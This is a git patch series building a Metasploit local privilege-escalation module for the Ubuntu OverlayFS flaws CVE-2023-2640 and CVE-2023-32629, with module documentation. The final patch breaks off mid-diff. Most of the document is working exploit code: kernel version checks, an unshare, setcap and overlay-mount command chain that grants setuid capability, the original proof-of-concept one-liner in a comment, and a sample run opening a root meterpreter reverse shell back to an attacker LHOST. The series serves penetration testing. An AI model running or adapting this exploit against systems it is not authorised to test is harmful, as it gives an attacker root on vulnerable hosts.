From 5edec2525f8b36406b17cbfea7d8348e82cacd26 Mon Sep 17 00:00:00 2001 From: Corey Date: Tue, 6 Aug 2024 15:29:17 -0400 Subject: [PATCH 01/11] Rebase and Squash init Add moduel scaffolding Add Opts, check and exploit methods Rubocop changes Add checks for vunerable kernel versions Write check for distro type Finish protoype of check add exploit Make changes to check method Add checkcode Add x86 for payload compatability remove check, add kernel version add codenam, transform keys in vuln Note minor spelling change Add description Add cve references Start trying to drop payloads on disk Change description, include modules for file upload, use proper methods for writing payload continue trying to upload Use write_file instead of upload_and_chmodx remove upload_dir opt expirement w g1vi exploit Include cmd_stage module, add generate_payload_exe, run payload in new namespace Add missing call to setcap, fix description Fix unterminated string, fix directory for calling python copy Rubocop changes Create dynamic payload Add mkdir_p and WritableDir opts Update modules/exploits/linux/local/game_overlay_privesc.rb Co-authored-by: Julien Voisin Revert back to python exploit, add dynamic writable dir Add todos Remove FileUtils Change module name Add checkcodes Add more checkcodes --- .../linux/local/gameoverlay_privesc.rb | 164 ++++++++++++++++++ 1 file changed, 164 insertions(+) create mode 100644 modules/exploits/linux/local/gameoverlay_privesc.rb diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb new file mode 100644 index 000000000000..4bada28aff10 --- /dev/null +++ b/modules/exploits/linux/local/gameoverlay_privesc.rb @@ -0,0 +1,164 @@ +class MetasploitModule < Msf::Exploit::Local + + prepend Msf::Exploit::Remote::AutoCheck + include Msf::Post::Linux::System + include Msf::Post::Linux::Kernel + include Msf::Post::File + include Msf::Exploit::FileDropper + include Msf::Exploit::CmdStager + include FileUtils + + # TODO + # 1) Add Msf::Post::Linux::System::get_sysinfo to get linux and kernel versions + # ^ What does the output change to + # + # 4) Make exploit more readable with multiline string, change exploit to use + # todo add python requirement + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'GameOver(lay) Privilege Escalation and Container Escape', + 'Description' => %q{ + This module exploits the use of unsafe functions in a number of Ubuntu kernels + utilizing vunerable versions of overlayfs. To mitigate CVE-2021-3493 the Linux + kernel added a call to vfs_setxattr during ovl_do_setxattr. Due to independent + changes to the kernel by the Ubuntu development team __vfs_setxattr_noperm is + called during ovl_do_setxattr without calling the intermediate safety function + vfs_setxattr. Ultimatly this module allows for root access to be achieved by + writing setuid capabilities to a file which are not sanitized after being unioned + with the upper mounted directory. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'g1vi', # PoC + 'h00die', # Module Suggestion + 'gardnerapp', # MsF Module + ], + 'Platform' => ['linux'], + 'SessionTypes' => ['shell', 'meterpreter'], + 'DisclosureDate' => '2023-07-26', + 'References' => [ + ['URL', 'https://www.crowdstrike.com/blog/crowdstrike-discovers-new-container-exploit/'], + ['URL', 'https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629'], + ['URL', 'https://www.cvedetails.com/cve/CVE-2023-2640/'], + ['URL', 'https://www.cvedetails.com/cve/CVE-2023-32629/'], + ['URL', 'https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability'], + ['CVE', '2023-32629'], + ['CVE', '2023-2640'] + ], + 'Targets' => [ [ 'Linux', {} ] ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'CmdStagerFlavor' => 'bourne' + ) + ) + register_options [ + OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']), + OptString.new('PayloadFileName', [true, 'Name of payloadf', 'marv']) + ] + end + + def vuln + # Keys are ubuntu versions, vals is list of vunerable kernels + { + "Lunar Lobster": %w[6.2.0], # Ubuntu 23.04 + "Kinetic Kudu": %w[5.19.0], # Ubuntu 22.10 + "Jammy Jellyfish": %w[5.19.0 6.2.0], # Ubuntu 22.04 LTS + "Focal Fossa": %w[5.4.0], # Ubuntu 20.04 LTS + "Bionic Beaver": %w[5.4.0] # Ubuntu 18.04 LTS + }.transform_keys!(&:to_s) # w/o this key will be :"Bionic Beaver" + end + + def check + return CheckCode::Safe('Target is not linux.') unless session.platform == 'linux' + + # Must be Ubuntu + return CheckCode::Safe('Target is not Ubuntu.') unless kernel_version =~ /[uU]buntu/ + + os = cmd_exec 'cat /etc/os-release' + + # grab codename i.e. Focal Fossa + codename = os.scan(/\(\w* \w*\)/)[0] + + # Remove '(' and ')' + codename.delete_prefix!('(').delete_suffix!(')') + + print_status "Detected Ubuntu version: #{codename}" + + # uname -r + # yields something like 5.4.0-1018-blah + kernel = kernel_release + print_status "Detected kernel version: #{kernel}" + + # Make sure release is running vunerable kernel + # will this return in correct context?? + # could scan kernel to prevent looping if return below doesn't work + vuln[codename].each do |version| + if kernel.include? version + return CheckCode::Vulnerable "#{codename} with #{kernel} kernel is vunerable" + end + end + + return CheckCode::Safe("Target does not appear to be running a vunerable Ubuntu Distro or Kernel") + end + + def execute_command(_cmd, _opts = {}) + pay_file = datastore['PayloadFilename'] + + pay_dir = datastore['WritableDir'] + pay_dir += "/" unless pay_dir.ends_with? "/" + pay_dir += Rex::Text.rand_text_alpha 10 + + directories = %w[l u w m].flat_map { |e| "#{pay_dir}#{e}" } + + # Should we make sure directory doesn't already exist? + + directories.each do |dir| + print_status "Creating directory #{dir}" + mkdir dir + end + + register_dir_for_cleanup pay_dir + + print_status "Creating directory to store payload: #{pay_dir}" + pay_dir.concat "/" unless pay_dir.ends_with? "/" + cmd_exec "mkdir -p #{pay_dir}" + + register_dir_for_cleanup pay_dir + + pay = "#{pay_dir}#{pay_file}" + + print_status "Writing payload: #{pay}" + + write_file "#{pay}", generate_payload_exe + # works move test to low, run unshare mount set cap, shell + + print_status 'Starting new namespace, and running exploit...' + + # g1vi original + # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'" + + # TODO move running of payload and exploit to different cmd_exec calls + # Swap vulns w code names, make sure regexes work agsain,s + hack = <<-TEXT + unshare -rm sh -c \"cp /u*/b*/p*3 #{pay_dir}; + setcap cap_setuid+eip #{pay_dir}l/python3; + mount -t overlay overlay -o rw,lowerdir=#{pay_dir}l,upperdir=#{pay_dir}u,workdir=#{pay_dir}w #{pay_dir}m + && touch /tmp/main/m/* + \" + && #{pay_dir}/u/python3 -c 'import os;os.setuid(0); os.system(\"#{pay}\")' + TEXT + + print_status "Running exploit:\n '#{hack}'\n " + print_status "Output of command: #{cmd_exec_with_result(hack)}" + end + + def exploit + puts "System Info: #{get_sysinfo}" + execute_cmdstager + + # System Info: {:kernel=>"Linux ip-172-26-8-97 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux", :distro=>"ubuntu", :version=>"Ubuntu 20.04.6 LTS"} + end + +end From c927f22d66fa8f896442b98e30c92d8a66f58a75 Mon Sep 17 00:00:00 2001 From: gardnerapp <70026825+gardnerapp@users.noreply.github.com> Date: Fri, 20 Sep 2024 09:06:44 -0400 Subject: [PATCH 02/11] Update modules/exploits/linux/local/game_overlay_privesc.rb Co-authored-by: jheysel-r7 --- modules/exploits/linux/local/gameoverlay_privesc.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb index 4bada28aff10..77fdc6217a70 100644 --- a/modules/exploits/linux/local/gameoverlay_privesc.rb +++ b/modules/exploits/linux/local/gameoverlay_privesc.rb @@ -140,7 +140,6 @@ def execute_command(_cmd, _opts = {}) # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'" # TODO move running of payload and exploit to different cmd_exec calls - # Swap vulns w code names, make sure regexes work agsain,s hack = <<-TEXT unshare -rm sh -c \"cp /u*/b*/p*3 #{pay_dir}; setcap cap_setuid+eip #{pay_dir}l/python3; @@ -151,7 +150,7 @@ def execute_command(_cmd, _opts = {}) TEXT print_status "Running exploit:\n '#{hack}'\n " - print_status "Output of command: #{cmd_exec_with_result(hack)}" + print_status(cmd_exec_with_result(hack)) end def exploit From 51194ad0c974f36d9b00d4ad299d3126d04af82b Mon Sep 17 00:00:00 2001 From: gardnerapp <70026825+gardnerapp@users.noreply.github.com> Date: Fri, 20 Sep 2024 09:11:46 -0400 Subject: [PATCH 03/11] Rebase and maintain authorship Rebase and change payload delivery Rebase and remove cmdstager Update modules/exploits/linux/local/game_overlay_privesc.rb Co-authored-by: jheysel-r7 remove CmdStager Mixin Add PrependSetuid Remove python from exploit Remove generate_payload_exe and add dynamic directory to upper mount layer Change where payload is dropped Remove FileUtils module Call proper method for generating payload Seperate exploit and triggering of payload Seperate exploit and triggering payload test --- .../linux/local/gameoverlay_privesc.rb | 63 +++++++------------ 1 file changed, 22 insertions(+), 41 deletions(-) diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb index 77fdc6217a70..c156554ee2b2 100644 --- a/modules/exploits/linux/local/gameoverlay_privesc.rb +++ b/modules/exploits/linux/local/gameoverlay_privesc.rb @@ -5,15 +5,7 @@ class MetasploitModule < Msf::Exploit::Local include Msf::Post::Linux::Kernel include Msf::Post::File include Msf::Exploit::FileDropper - include Msf::Exploit::CmdStager - include FileUtils - # TODO - # 1) Add Msf::Post::Linux::System::get_sysinfo to get linux and kernel versions - # ^ What does the output change to - # - # 4) Make exploit more readable with multiline string, change exploit to use - # todo add python requirement def initialize(info = {}) super( @@ -50,12 +42,14 @@ def initialize(info = {}) ], 'Targets' => [ [ 'Linux', {} ] ], 'Arch' => [ ARCH_X86, ARCH_X64 ], - 'CmdStagerFlavor' => 'bourne' + 'DefaultOptions' => { + 'PrependSetuid' => true, + } ) ) register_options [ OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']), - OptString.new('PayloadFileName', [true, 'Name of payloadf', 'marv']) + OptString.new('PayloadFileName', [true, 'Name of payload', 'marv']), ] end @@ -103,61 +97,48 @@ def check return CheckCode::Safe("Target does not appear to be running a vunerable Ubuntu Distro or Kernel") end - def execute_command(_cmd, _opts = {}) + def exploit pay_file = datastore['PayloadFilename'] pay_dir = datastore['WritableDir'] pay_dir += "/" unless pay_dir.ends_with? "/" pay_dir += Rex::Text.rand_text_alpha 10 - directories = %w[l u w m].flat_map { |e| "#{pay_dir}#{e}" } + pay_dir += "/" unless pay_dir.ends_with? "/" + print_status "Creating directory to store payload: #{pay_dir}" + mkdir pay_dir - # Should we make sure directory doesn't already exist? + directories = %w[l u w m].flat_map { |e| "#{pay_dir}#{e}" } directories.each do |dir| print_status "Creating directory #{dir}" - mkdir dir + mkdir "#{dir}" end - register_dir_for_cleanup pay_dir - - print_status "Creating directory to store payload: #{pay_dir}" - pay_dir.concat "/" unless pay_dir.ends_with? "/" - cmd_exec "mkdir -p #{pay_dir}" - - register_dir_for_cleanup pay_dir - pay = "#{pay_dir}#{pay_file}" print_status "Writing payload: #{pay}" - write_file "#{pay}", generate_payload_exe - # works move test to low, run unshare mount set cap, shell + write_file pay, generate_payload.generate print_status 'Starting new namespace, and running exploit...' # g1vi original # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'" - # TODO move running of payload and exploit to different cmd_exec calls - hack = <<-TEXT - unshare -rm sh -c \"cp /u*/b*/p*3 #{pay_dir}; - setcap cap_setuid+eip #{pay_dir}l/python3; - mount -t overlay overlay -o rw,lowerdir=#{pay_dir}l,upperdir=#{pay_dir}u,workdir=#{pay_dir}w #{pay_dir}m - && touch /tmp/main/m/* - \" - && #{pay_dir}/u/python3 -c 'import os;os.setuid(0); os.system(\"#{pay}\")' - TEXT - - print_status "Running exploit:\n '#{hack}'\n " - print_status(cmd_exec_with_result(hack)) - end + # Exploit overlayfs vuln + hack = "unshare -rm sh -c \" cd #{pay_dir} && cp #{pay} l/; setcap cap_setuid+eip l/#{pay_file}; + mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*\"" + - def exploit - puts "System Info: #{get_sysinfo}" - execute_cmdstager + print_status "Running exploit:\n'#{hack}'\n" + print_status(cmd_exec_with_result(hack).to_s) + + # Trigger payload + trigger = "cp #{pay_dir}u/#{pay_file} /home/ubuntu/test_payload; chmod +x #{pay_dir}u/#{pay_file} && #{pay_dir}u/#{pay_file}" - # System Info: {:kernel=>"Linux ip-172-26-8-97 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux", :distro=>"ubuntu", :version=>"Ubuntu 20.04.6 LTS"} + print_status "Triggering payload: #{trigger}" + print_status(cmd_exec_with_result(trigger).to_s) end end From 883a0f8985362151d1151b5caeaf9b3627d35695 Mon Sep 17 00:00:00 2001 From: gardnerapp <70026825+gardnerapp@users.noreply.github.com> Date: Sun, 29 Sep 2024 08:04:32 -0400 Subject: [PATCH 04/11] Update modules/exploits/linux/local/gameoverlay_privesc.rb Co-authored-by: Brendan --- .../linux/local/gameoverlay_privesc.rb | 27 ++++++++++++++++--- 1 file changed, 23 insertions(+), 4 deletions(-) diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb index c156554ee2b2..5a5dd6372285 100644 --- a/modules/exploits/linux/local/gameoverlay_privesc.rb +++ b/modules/exploits/linux/local/gameoverlay_privesc.rb @@ -40,10 +40,29 @@ def initialize(info = {}) ['CVE', '2023-32629'], ['CVE', '2023-2640'] ], - 'Targets' => [ [ 'Linux', {} ] ], - 'Arch' => [ ARCH_X86, ARCH_X64 ], - 'DefaultOptions' => { - 'PrependSetuid' => true, + 'Targets' => [ + [ + 'Linux_Binary', + { + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'PrependSetuid' => true + } + ], + [ + 'Linux_Command', + { + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'BadChars' => "\x93\x94" + } + } + ] + ], + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [ARTIFACTS_ON_DISK] } ) ) From e506c34e13a7299f88a1bc0a501c94fc541bbf94 Mon Sep 17 00:00:00 2001 From: gardnerapp <70026825+gardnerapp@users.noreply.github.com> Date: Sun, 29 Sep 2024 08:05:27 -0400 Subject: [PATCH 05/11] Update modules/exploits/linux/local/gameoverlay_privesc.rb Co-authored-by: Brendan --- .../linux/local/gameoverlay_privesc.rb | 19 +++++++++++++++---- 1 file changed, 15 insertions(+), 4 deletions(-) diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb index 5a5dd6372285..20d312a21afb 100644 --- a/modules/exploits/linux/local/gameoverlay_privesc.rb +++ b/modules/exploits/linux/local/gameoverlay_privesc.rb @@ -118,16 +118,27 @@ def check def exploit pay_file = datastore['PayloadFilename'] - pay_dir = datastore['WritableDir'] pay_dir += "/" unless pay_dir.ends_with? "/" pay_dir += Rex::Text.rand_text_alpha 10 - pay_dir += "/" unless pay_dir.ends_with? "/" print_status "Creating directory to store payload: #{pay_dir}" mkdir pay_dir - - directories = %w[l u w m].flat_map { |e| "#{pay_dir}#{e}" } + pay_dir = datastore['WritableDir'] + pay_dir << '/' unless pay_dir.ends_with? '/' + pay_dir += Rex::Text.rand_text_alpha(rand(6..13)) + pay_dir << '/' + directories = [] + directories << pay_dir + lower_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/' + directories << lower_dir + upper_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/' + directories << upper_dir + work_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/' + directories << work_dir + merge_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/' + directories << merge_dir + bash_copy = '/var/tmp/bash' directories.each do |dir| print_status "Creating directory #{dir}" From c6425f72454269b52348e7128c8489aecab4c123 Mon Sep 17 00:00:00 2001 From: gardnerapp <70026825+gardnerapp@users.noreply.github.com> Date: Sun, 29 Sep 2024 08:06:01 -0400 Subject: [PATCH 06/11] Break out command building to make it easier to read Update modules/exploits/linux/local/gameoverlay_privesc.rb Co-authored-by: Brendan --- .../linux/local/gameoverlay_privesc.rb | 32 +++++++++++-------- 1 file changed, 19 insertions(+), 13 deletions(-) diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb index 20d312a21afb..ae4006d8972e 100644 --- a/modules/exploits/linux/local/gameoverlay_privesc.rb +++ b/modules/exploits/linux/local/gameoverlay_privesc.rb @@ -6,7 +6,6 @@ class MetasploitModule < Msf::Exploit::Local include Msf::Post::File include Msf::Exploit::FileDropper - def initialize(info = {}) super( update_info( @@ -157,18 +156,25 @@ def exploit # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'" # Exploit overlayfs vuln - hack = "unshare -rm sh -c \" cd #{pay_dir} && cp #{pay} l/; setcap cap_setuid+eip l/#{pay_file}; - mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*\"" - - - print_status "Running exploit:\n'#{hack}'\n" - print_status(cmd_exec_with_result(hack).to_s) - - # Trigger payload - trigger = "cp #{pay_dir}u/#{pay_file} /home/ubuntu/test_payload; chmod +x #{pay_dir}u/#{pay_file} && #{pay_dir}u/#{pay_file}" - - print_status "Triggering payload: #{trigger}" - print_status(cmd_exec_with_result(trigger).to_s) + # Build the command + + exploit_cmd = 'unshare -rm sh -c "' + exploit_cmd << "cp #{cmd_exec('which python3')} #{lower_dir}; " + exploit_cmd << "setcap cap_setuid+eip #{lower_dir}python3; " + exploit_cmd << "mount -t overlay overlay -o rw,lowerdir=#{lower_dir},upperdir=#{upper_dir},workdir=#{work_dir} #{merge_dir} && " + exploit_cmd << "touch #{merge_dir}*; \" && " + exploit_cmd << "#{upper_dir}python3 -c 'import os;os.setuid(0);os.system(" + exploit_cmd << "\"cp /bin/bash #{bash_copy} && chmod +x #{bash_copy} && " + exploit_cmd << "chmod +x #{payload_cmd} && " unless target.arch.first == ARCH_CMD + exploit_cmd << "#{bash_copy} -p -c " + exploit_cmd << payload_cmd + exploit_cmd << ' && ' unless target.arch.first == ARCH_CMD + exploit_cmd << " rm -rf #{lower_dir} #{merge_dir} #{upper_dir} #{work_dir} #{bash_copy}\")'" + + vprint_status(exploit_cmd.to_s) + + output = cmd_exec(exploit_cmd) + print_status(output) end end From 6e09722f67e6e3d66442f2283f1bc0505a8630c8 Mon Sep 17 00:00:00 2001 From: gardnerapp <70026825+gardnerapp@users.noreply.github.com> Date: Sun, 29 Sep 2024 08:06:17 -0400 Subject: [PATCH 07/11] Rubocop changes and arch tracking for payload Update modules/exploits/linux/local/gameoverlay_privesc.rb Co-authored-by: Brendan Rubocop changes --- .../linux/local/gameoverlay_privesc.rb | 28 ++++++++++--------- 1 file changed, 15 insertions(+), 13 deletions(-) diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb index ae4006d8972e..a5f219453485 100644 --- a/modules/exploits/linux/local/gameoverlay_privesc.rb +++ b/modules/exploits/linux/local/gameoverlay_privesc.rb @@ -112,15 +112,15 @@ def check end end - return CheckCode::Safe("Target does not appear to be running a vunerable Ubuntu Distro or Kernel") + return CheckCode::Safe('Target does not appear to be running a vunerable Ubuntu Distro or Kernel') end def exploit - pay_file = datastore['PayloadFilename'] + datastore['PayloadFilename'] pay_dir = datastore['WritableDir'] - pay_dir += "/" unless pay_dir.ends_with? "/" + pay_dir += '/' unless pay_dir.ends_with? '/' pay_dir += Rex::Text.rand_text_alpha 10 - pay_dir += "/" unless pay_dir.ends_with? "/" + pay_dir += '/' unless pay_dir.ends_with? '/' print_status "Creating directory to store payload: #{pay_dir}" mkdir pay_dir pay_dir = datastore['WritableDir'] @@ -141,20 +141,22 @@ def exploit directories.each do |dir| print_status "Creating directory #{dir}" - mkdir "#{dir}" + mkdir dir.to_s end - pay = "#{pay_dir}#{pay_file}" - - print_status "Writing payload: #{pay}" - - write_file pay, generate_payload.generate - - print_status 'Starting new namespace, and running exploit...' + if target.arch.first == ARCH_CMD + payload_cmd = "\\\"#{payload.encoded}\\\"" + else + pay_file = datastore['PayloadFilename'] + payload_path = "#{pay_dir}#{pay_file}" + print_status "Writing payload: #{payload_path}" + write_file(payload_path, generate_payload_exe) + payload_cmd = payload_path + end # g1vi original # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'" - + # Exploit overlayfs vuln # Build the command From 19770cf8702a674357cfe494db32f5fd3a4ae494 Mon Sep 17 00:00:00 2001 From: gardnerapp <70026825+gardnerapp@users.noreply.github.com> Date: Thu, 3 Oct 2024 19:43:15 -0400 Subject: [PATCH 08/11] Remove unneeded file and rudocop corrections Update modules/exploits/linux/local/gameoverlay_privesc.rb Co-authored-by: Brendan Give bwatters7 credit, add docs Experiment with randomized bash copy and Rex::File.join remove unused line Add missing parenthesis fix problem with bash copy Remove rex::join, call proper method for generating payload add exploit::exe mixin, bash copy randomization Rubocop changes Remove nc --- .../linux/local/gameoverlay_privesc.md | 148 ++++++++++++++++++ .../linux/local/gameoverlay_privesc.rb | 23 +-- 2 files changed, 162 insertions(+), 9 deletions(-) create mode 100644 documentation/modules/exploit/linux/local/gameoverlay_privesc.md diff --git a/documentation/modules/exploit/linux/local/gameoverlay_privesc.md b/documentation/modules/exploit/linux/local/gameoverlay_privesc.md new file mode 100644 index 000000000000..38f00adb4a51 --- /dev/null +++ b/documentation/modules/exploit/linux/local/gameoverlay_privesc.md @@ -0,0 +1,148 @@ +## Description + +CVE-2023-2640 and CVE-2023-32629 are vunerabilites that allow for the arbitrary setting of +capabilities while overlaying filesystems. On most Linux Kernels during the execution of + `ovl_do_setxattr` an intermediate function `vfs_setxatrr` converts file capabilities in a +way that limits them to the current namesapce. However, on some versions of the Ubuntu kernel + `_vfs_setxattr_noperm` is called directly without calling `vfs_setxattr`. + +When a new namespace is created the user will technically be "root" within that given +namespace. This module will take advantage of this by setting the `CAP_SETUID` capability +on a system binary. It will then perform filesystem overlay, copying the binary into the lower +directory. Because of the flaws described above when the binary is transfered into the upper +directory it's capabilities will not be sanitized and persist in the "normal" namespace. + +## Vunerable Application + +These vunerabilities are somewhat unique in that they effect a wide variety of Ubuntu releases +and kernel versions, as described in the list below. + +Ubuntu 23.04 (Lunar Lobster)m kernel 6.2.0, (CVE-2023-2640 & CVE-2023-32629) + +Ubuntu 22.10 (Kinetic Kudu), kernel -> 5.19.0, (CVE-2023-2640 & CVE-2023-32629) + +Ubuntu 22.04 LTS (Jammy Jellyfish), kernel -> 5.19.0, (CVE-2023-2640 & CVE-2023-32629) + +Ubuntu 22.04 LTS (Jammy Jellyfish), kernel -> 6.2.0, (CVE-2023-2640 & CVE-2023-32629) + +Ubuntu 20.04 LTS (Focal Fossa), kernel -> 5.4.0, (CVE-2023-32629) + +Ubuntu 18.04 LTS (Bionic Beaver), kernel -> 5.4.0, (CVE-2023-32629) + +The user can download a vunerable version, for example: + +``` +sudo apt update +sudo apt install -y linux-image-5.19.0-41-generic linux-headers-5.19.0-41-generic +reboot +``` +While testing @bwatters7 mentioned taking the system Be sure to take the system offline to +prevent the vunerabilities from silently being patched. + +This module has succesfully been tested on the following: + +Ubuntu 22.04 LTS (Jammy Jellyfish) 5.19.0-41-generic + +Ubuntu 20.04 LTS (Focal Fossa) 5.4.0-1018-aws + +## Verification Steps + +1). Start `msfconsole` + +2). Get a session on a vunerable system + +3). Use `exploit/linux/local/gameoverlay_privesc` + +4). Optional: choose target for payload, either system command (1) or payload (2) +`set target 1` + +5). Set session `set session [SESSION]` + +5). Do. `run` + +6). You should get a new session running as root. + +## Options + +### Payload File Name +Name of the file storing the payload, default is `marv`. + +### Writable Dir +The name of a directory with write permissions, defualt is `/tmp`. This will be where the +payload file will be created. Additionally during the exploit a series of directories will be +created here to perform the filesystem overlaying. + +## Scenarios + +You have a non-root session on one of the systems described above. Please note that this +module will automatically run checks to determine if the system is vunerable, you can disable +this with `set AutoCheck False`. + +``` + > use exploit/linux/local/gameoverlay_privesc +[*] No payload configured, defaulting to linux/aarch64/meterpreter/reverse_tcp +msf6 exploit(linux/local/gameoverlay_privesc) > set session 1 +session => 1 +msf6 exploit(linux/local/gameoverlay_privesc) > set target 0 +target => 0 +msf6 exploit(linux/local/gameoverlay_privesc) > set payload linux/aarch64/meterpreter_reverse_tcp +payload => linux/aarch64/meterpreter_reverse_tcp +msf6 exploit(linux/local/gameoverlay_privesc) > set lhost 10.5.135.201 +lhost => 10.5.135.201 +msf6 exploit(linux/local/gameoverlay_privesc) > show options + +Module options (exploit/linux/local/gameoverlay_privesc): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + PayloadFileName pVmtuGOGXdO yes Name of payload + SESSION 1 yes The session to run this module on + WritableDir /tmp yes A directory where we can write files + + +Payload options (linux/aarch64/meterpreter_reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 10.5.135.201 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Linux_Binary + + + +View the full module info with the info, or info -d command. + +msf6 exploit(linux/local/gameoverlay_privesc) > run + +[*] Started reverse TCP handler on 10.5.135.201:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Detected Ubuntu version: Jammy Jellyfish +[*] Detected kernel version: 5.19.0-41-generic +[+] The target is vulnerable. Jammy Jellyfish with 5.19.0-41-generic kernel is vunerable +[*] Creating directory /tmp/UqNFkc/ +[*] Creating directory /tmp/UqNFkc/QKZiqWWsnSOz/ +[*] Creating directory /tmp/UqNFkc/WbrucZxIAlWZF/ +[*] Creating directory /tmp/UqNFkc/uKmqunqY/ +[*] Creating directory /tmp/UqNFkc/pwFUmC/ +[*] Writing payload: /tmp/UqNFkc/pVmtuGOGXdO +[*] Starting new namespace, and running exploit... +[+] Deleted /tmp/UqNFkc/ +[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.149:49168) at 2024-10-02 16:28:43 -0500 +[*] + +meterpreter > sysinfo +Computer : 10.5.132.149 +OS : Ubuntu 22.04 (Linux 5.19.0-41-generic) +Architecture : aarch64 +BuildTuple : aarch64-linux-musl +Meterpreter : aarch64/linux +meterpreter > getuid +Server username: root +meterpreter > +``` diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb index a5f219453485..4cf02a618ada 100644 --- a/modules/exploits/linux/local/gameoverlay_privesc.rb +++ b/modules/exploits/linux/local/gameoverlay_privesc.rb @@ -5,6 +5,7 @@ class MetasploitModule < Msf::Exploit::Local include Msf::Post::Linux::Kernel include Msf::Post::File include Msf::Exploit::FileDropper + include Msf::Exploit::EXE def initialize(info = {}) super( @@ -25,6 +26,7 @@ def initialize(info = {}) 'Author' => [ 'g1vi', # PoC 'h00die', # Module Suggestion + 'bwatters-r7', # MsF Module 'gardnerapp', # MsF Module ], 'Platform' => ['linux'], @@ -43,7 +45,7 @@ def initialize(info = {}) [ 'Linux_Binary', { - 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'Arch' => [ ARCH_AARCH64, ARCH_X64 ], 'PrependSetuid' => true } ], @@ -116,28 +118,31 @@ def check end def exploit - datastore['PayloadFilename'] pay_dir = datastore['WritableDir'] pay_dir += '/' unless pay_dir.ends_with? '/' - pay_dir += Rex::Text.rand_text_alpha 10 - pay_dir += '/' unless pay_dir.ends_with? '/' + + pay_dir += Rex::Text.rand_text_alpha(rand(6..13)) + '/' + print_status "Creating directory to store payload: #{pay_dir}" mkdir pay_dir - pay_dir = datastore['WritableDir'] - pay_dir << '/' unless pay_dir.ends_with? '/' - pay_dir += Rex::Text.rand_text_alpha(rand(6..13)) - pay_dir << '/' + directories = [] directories << pay_dir + lower_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/' directories << lower_dir + upper_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/' directories << upper_dir + work_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/' directories << work_dir + merge_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/' directories << merge_dir - bash_copy = '/var/tmp/bash' + + 